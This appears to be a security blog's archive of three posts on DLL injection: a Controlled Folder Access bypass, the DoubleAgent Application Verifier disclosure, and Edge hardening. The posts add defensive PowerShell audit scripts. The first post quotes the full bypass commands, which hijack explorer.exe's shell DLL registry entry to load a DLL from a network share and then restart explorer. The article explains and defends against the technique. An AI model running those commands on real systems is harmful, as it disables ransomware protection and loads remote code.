Tag Archives: DLL Injection

Security Researcher Demonstrates Bypass for Controlled Folder Access

In Windows 10 version 1709 (also known as the Fall Creators Update or Redstone 3) and later versions, Microsoft introduced a feature known as Controlled Folder Access, which aims to prevent ransomware (or unknown applications) from encrypting files within folders that you specify. Further details are provided here.

Last week at the DerbyCon security conference, a security researcher, Soya Aoyama from Fujitsu System Integration Laboratories, demonstrated how DLL injection (the technique of DLL injection is explained in more detail here and here) could be used to add a DLL (defined) to the user interface (UI) of Windows 10 (in the form of the shell process, explorer.exe).

Controlled Folder Access works by preventing any application not present on a whitelist (a list of allowed applications) from modifying the files in the folders listed as protected. Because explorer.exe is present on that allowed list, the researcher was able to bypass this ransomware protection by adding the DLL as a context menu handler. This list of context menu handlers is what usually allows you, for example, to perform an anti-malware scan on a file by right-clicking it or to compress a file using 7-Zip. The list is stored in the Windows Registry at the following location:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

In order to interact with a user, explorer.exe by default loads shell.dll from the following location:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32

Aoyama changed the DLL value from shell.dll to his own DLL so that explorer.exe would load it when it started. He then terminated and restarted explorer.exe, which successfully loaded his DLL.

Microsoft currently not in favour of patching this vulnerability
As per Microsoft’s 10 immutable laws of security, at this time they don’t intend to patch this vulnerability since it relies on an attacker having already compromised your system and using it to run a legitimate command to load a malicious DLL into explorer.exe:

reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InProcServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll

taskkill /IM explorer.exe /F

start explorer.exe

Due to this prerequisite of compromising the system first, this issue won’t be patched. This bypass, however, does not require administrative (defined) access. Aoyama also demonstrated that Windows Defender did not detect this bypass; neither did other anti-malware solutions such as Avast, ESET, Malwarebytes Premium or McAfee.

How can I protect myself from this bypass?
There are limited options available at this time to prevent this bypass from occurring. If an attacker can download the necessary DLL to your system and load it, there is a possibility that your anti-malware solution may detect it, since the DLL will likely have a low reputation (it would not be a commonly used file), but this is not guaranteed. This is especially true since the other anti-malware vendors tested did not detect it.

HitmanPro.Alert may detect this DLL on your system before it has been added to explorer.exe, but this would require you to have the premium version installed and monitoring your systems.

The key to preventing the above from occurring is to follow standard email and instant messaging best practices and to lock your system (requiring a password or other form of authentication when you return to it) when you are away from it, to prevent someone entering commands. Keeping your system up to date will also reduce the risk of such a DLL being downloaded if you were to click on a link in an email or instant message, or via a drive-by download.

If an attacker can physically access your system and type commands on it, application whitelisting in the form of Windows AppLocker would not by default prevent this attack (and even that feature can be bypassed), since the commands run by Aoyama make use of legitimate Windows tools. If an attacker were to try to execute a script containing the commands (which is far more likely), AppLocker would block it if it is configured to block unknown scripts.

The DLL blocking feature of Windows AppLocker would also assist in this context, but may introduce a performance penalty due to the level of effort needed to carry out these checks.

Monitoring the location within the Windows Registry for changes using a tool such as Autoruns is also a possibility, but you would need to do this manually and, given that ransomware doesn’t usually wait to encrypt your files, this is likely to be ineffective or too slow to detect this bypass.
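One way to make that registry check repeatable rather than manual is a short read-only audit script. The one below is an added example, not code from the original post or from Aoyama: it reports whether the current user has a per-user InProcServer32 override for the CLSID quoted above (the HKCU key that takes precedence over the HKLM one in the merged HKEY_CLASSES_ROOT view), and it resolves every ContextMenuHandlers entry to its DLL and flags DLLs on UNC paths, in user-writable locations, missing from disk, or without a valid Authenticode signature. The heuristics in Test-SuspiciousDll are my own assumptions about what a reviewer would want flagged; it goes beyond the single CLSID in the post by checking all registered handlers.

```powershell
# Added audit script (not code from the original post or from Aoyama): reports whether a
# per-user override exists for the CLSID named in the post and lists the DLLs behind the
# context menu handlers that explorer.exe loads. Read-only; run as the user being audited.

$clsid      = '{90AA3A4E-1CBA-4233-B8BB-535773D48449}'   # CLSID quoted in the post
$machineKey = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InProcServer32"
$userKey    = "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32"

function Get-DefaultValue([string]$Path) {
    # Returns the '(default)' value of a registry key, or $null when the key is absent.
    if (Test-Path -LiteralPath $Path) {
        (Get-ItemProperty -LiteralPath $Path).'(default)'
    }
}

function Test-SuspiciousDll([string]$Dll) {
    # Assumed reviewer heuristics: missing value, UNC path (as in the demo), a user-writable
    # location, a file that does not exist, or a file without a valid Authenticode signature.
    if (-not $Dll) { return $true }
    $expanded = [Environment]::ExpandEnvironmentVariables($Dll).Trim('"')
    if ($expanded.StartsWith('\\')) { return $true }
    if (-not [IO.Path]::IsPathRooted($expanded)) {
        # A bare file name is loaded via the search path; System32 is the normal home.
        $expanded = Join-Path $env:SystemRoot "System32\$expanded"
    }
    if ($expanded -match '\\(Users|Temp|AppData|ProgramData)\\') { return $true }
    if (-not (Test-Path -LiteralPath $expanded)) { return $true }
    return (Get-AuthenticodeSignature -LiteralPath $expanded).Status -ne 'Valid'
}

# 1. Per-user override. HKEY_CLASSES_ROOT is a merged view in which HKCU\Software\Classes
#    takes precedence over HKLM\SOFTWARE\Classes, so a key here replaces the DLL for this
#    user without administrative rights, which is why the demo needed none.
$machineDll = Get-DefaultValue $machineKey
$userDll    = Get-DefaultValue $userKey
if ($userDll) {
    Write-Warning "Per-user InProcServer32 override for $clsid"
    Write-Warning "  HKLM: $machineDll"
    Write-Warning "  HKCU: $userDll  (suspicious: $(Test-SuspiciousDll $userDll))"
} else {
    Write-Output "No per-user InProcServer32 override for $clsid (HKLM value: $machineDll)"
}

# 2. Context menu handlers registered for all file types, each resolved to its DLL.
Get-ChildItem -LiteralPath 'Registry::HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers' |
    ForEach-Object {
        $handlerClsid = Get-DefaultValue $_.PSPath
        if (-not $handlerClsid) { $handlerClsid = $_.PSChildName }   # key name may be the CLSID
        $handlerClsid = $handlerClsid.Trim()
        $dll = Get-DefaultValue "Registry::HKEY_CLASSES_ROOT\CLSID\$handlerClsid\InProcServer32"
        [PSCustomObject]@{
            Handler    = $_.PSChildName
            CLSID      = $handlerClsid
            Dll        = $dll
            Suspicious = Test-SuspiciousDll $dll
        }
    } | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Run it from a normal (non-elevated) PowerShell session for the user you want to check, since the HKCU override is per user; a scheduled run that diffs the table against a known-good copy turns the manual Autoruns check into something closer to continuous monitoring. Legitimate third-party handlers that are unsigned will also be flagged, so treat "Suspicious" as a review queue rather than a verdict.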

Given the attention this bypass has received, anti-malware software may detect changes to the explorer.exe context menu handlers or the shell DLL location going forward, but again this is not guaranteed.

I am investigating another option and will update this post when I have more information available.

Thank you.


“DoubleAgent” Vulnerability Disclosure: What you need to know

In late March a security vulnerability was disclosed by the Israeli security firm Cybellum. However, this was no ordinary public disclosure, as I will explain below. Apologies for the untimely nature of this blog post due to other commitments:

What made this disclosure different?
At first glance this disclosure appeared very serious. It discussed the use of the Microsoft Application Verifier, present within Windows XP up to and including Windows 10. They detail how this tool can be leveraged to add a customised verifier DLL (defined) to hijack any legitimate process (defined) within Windows.

They demonstrated this attack against anti-malware software, specifically Norton Security (by Symantec), resulting in a rogue DLL being injected (defined here and here) into the Norton process (ns.exe, as demonstrated within their YouTube video). Despite Cybellum’s claims, security firms such as Avira and Comodo have reported that this attack cannot bypass the self-protection features within their products. The full list of capabilities this attack provides is within this news article.

Windows Internals expert Alex Ionescu later revealed that the researchers from Cybellum used his work concerning protected processes to create this exploit and that this was already a known issue. As was pointed out in the Twitter timelines linked to below, once an attacker has administrative control over your system they could simply uninstall your security software rather than trying to bypass it, rendering the threat of this exploit far less important/relevant.

Twitter Timeline 1
Twitter Timeline 2
Twitter Timeline 3
Twitter Timeline 4
Twitter Timeline 5

Does this disclosure only affect security software?
It’s important to note that this attack potentially affects all software on Windows rather than just security software. In addition, the proof of concept (PoC) exploit requires no changes for any application you choose to attack. Security software was chosen since almost all systems have anti-malware software installed and their process names are trusted (and allowed within application whitelisted (defined) environments).

How can I protect myself from this exploit?
Since this attack requires administrative privileges (defined) on Windows to have the intended effect, using a standard user account for everyday use will mitigate this attack.

From the various statements issued by the affected anti-malware vendors (listed below), please ensure your anti-malware software is the latest version available to ensure this attack is ineffective.

Traditional defences such as patching your operating system and your web browser, and being cautious of the attachments you open, will also reduce the risk posed by this attack.
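Because the attack registers a verifier DLL against a target process, an administrator can also check which processes on a machine currently have Application Verifier providers registered. The script below is an added example, not code from the original post or from Cybellum. It assumes the documented Application Verifier configuration, namely the VerifierDlls and GlobalFlag values under the Image File Execution Options (IFEO) keys, which the post itself does not spell out; it lists every registration in both the 64-bit and WOW64 views and flags providers that are not Microsoft-signed.

```powershell
# Added audit script (not code from the original post or from Cybellum): lists every process
# that has Application Verifier provider DLLs registered and flags providers that are not
# Microsoft-signed. Assumption: Application Verifier reads its provider list from the
# documented IFEO values below; run with administrative rights so every subkey is readable.
# Read-only.

$FLG_APPLICATION_VERIFIER = 0x100   # GlobalFlag bit that turns verifier loading on

# 64-bit and 32-bit views; verifier DLLs are loaded from the matching system directory.
$views = @(
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
       Dir = Join-Path $env:SystemRoot 'System32' },
    @{ Key = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
       Dir = Join-Path $env:SystemRoot 'SysWOW64' }
)

function Get-VerifierRegistrations {
    foreach ($view in $views) {
        if (-not (Test-Path -LiteralPath $view.Key)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $view.Key) {
            $props = Get-ItemProperty -LiteralPath $key.PSPath
            if (-not $props.VerifierDlls) { continue }
            # GlobalFlag may be stored as a DWORD or as a string such as "0x100"; [int] handles both.
            $globalFlag = if ($props.GlobalFlag) { [int]$props.GlobalFlag } else { 0 }
            foreach ($dll in ($props.VerifierDlls -split '\s+' | Where-Object { $_ })) {
                $path   = Join-Path $view.Dir $dll
                $signer = $null
                if (Test-Path -LiteralPath $path) {
                    $sig = Get-AuthenticodeSignature -LiteralPath $path
                    if ($sig.Status -eq 'Valid') { $signer = $sig.SignerCertificate.Subject }
                }
                [PSCustomObject]@{
                    Process     = $key.PSChildName
                    VerifierDll = $dll
                    Enabled     = ($globalFlag -band $FLG_APPLICATION_VERIFIER) -ne 0
                    Path        = $path
                    Signer      = $signer
                    Suspicious  = -not ($signer -and $signer -match 'Microsoft')
                }
            }
        }
    }
}

Get-VerifierRegistrations | Format-Table -AutoSize
```

On a workstation that has never run Application Verifier the table should be empty; a registration against an anti-malware process whose provider is unsigned or lives under a vendor name you do not recognise is exactly the configuration the disclosure describes and is worth investigating. Since writing these keys requires administrative rights, the standard-user advice above remains the primary control; this script is the audit that backs it up.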

NetworkWorld Anti-Malware Vendor Responses

Malwarebytes Anti-malware

Symantec Endpoint Protection

Symantec Endpoint Protection Affected Versions

Thank you.

Microsoft Updates Edge Browser To Harden Against DLL Injection

On the 12th of November, Microsoft began rolling out Windows 10 Build 10586 (also known as Version 1511). This was the first major update made available for Windows 10. Included in this update was an improved version of Microsoft Edge, the default browser of Windows 10.

For most consumers, this update will be delivered automatically to their PCs. Businesses and large organizations using the new Windows Update for Business should be able to choose a time when they wish to deploy this update more widely to their employees.

What’s The Main Security Improvement in This Update?
In the updated version of Microsoft Edge, known as EdgeHTML 13, DLLs (Dynamic Link Libraries, defined) are no longer permitted to load within Edge. DLLs are loaded into a Windows application using a technique known as DLL injection; the technique is explained in more detail here and here. It is this technique that Edge has been hardened against, to prevent it succeeding.
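A simple way to see what this hardening means in practice is to list the modules loaded into a running browser process and check where each one came from and who signed it. The script below is an added example, not code from the original post or from Microsoft: Get-ForeignModules enumerates a process’s loaded DLLs and returns those that live outside the Windows directory or are not Microsoft-signed. The process name ‘MicrosoftEdge’ is a placeholder assumption, and the session must match the target process’s bitness, since module enumeration across bitness fails.

```powershell
# Added example (not code from the original post or from Microsoft): lists the DLLs loaded
# into a running process and returns any that are not Microsoft-signed or that live outside
# the Windows directory. Assumptions: the process name is supplied by the caller and
# 'MicrosoftEdge' is a placeholder; the PowerShell session has the same bitness as the
# target process. Read-only.

function Get-ForeignModules {
    param([Parameter(Mandatory)][string]$ProcessName)
    $windir = $env:SystemRoot
    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction Stop) {
        try {
            $modules = $proc.Modules
        } catch {
            # Protected or cross-bitness processes refuse module enumeration.
            Write-Warning "Cannot read modules of PID $($proc.Id): $_"
            continue
        }
        foreach ($m in $modules) {
            $path = $m.FileName
            $sig  = Get-AuthenticodeSignature -LiteralPath $path
            $signer = if ($sig.Status -eq 'Valid') { $sig.SignerCertificate.Subject } else { $null }
            $inWindows = $path.StartsWith($windir, [StringComparison]::OrdinalIgnoreCase)
            $microsoft = [bool]($signer -and $signer -match 'Microsoft')
            if (-not $inWindows -or -not $microsoft) {
                [PSCustomObject]@{
                    Process = "$($proc.ProcessName) ($($proc.Id))"
                    Module  = $m.ModuleName
                    Path    = $path
                    Signer  = $signer
                }
            }
        }
    }
}

Get-ForeignModules -ProcessName 'MicrosoftEdge' | Format-Table -AutoSize
```

For a browser that blocks foreign DLLs the output should be empty; a non-empty table on any process is the starting point for working out which product injected the module and whether it belongs there. Get-AuthenticodeSignature checks catalog signatures on current Windows versions, so DLLs in System32 that carry no embedded signature still report as Valid.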

Why Was This Change Made?
If an unauthorized DLL is loaded into a web browser, it can do such things as display unwanted adverts (such as the type previously discussed by Google) or install unnecessary toolbars that may attempt to redirect your web searches from your preferred search engine to another in order to benefit from increased usage (and possibly increased revenue when adverts are displayed among those search results). Such unwanted adverts and/or toolbars annoy and distract users and make their web browser less user friendly.

If I’m a Microsoft Edge user, how will this benefit me?
If you like using Microsoft Edge on Windows 10, this change will mean that it will be harder for adware and malware to be loaded into your browser, either for malicious purposes or simply to display adverts. This means that your web browser is more likely to work the way you prefer and you can simply concentrate on what you would like to do.

I welcome this change which makes every day browsing for Microsoft Edge users safer. Thank you.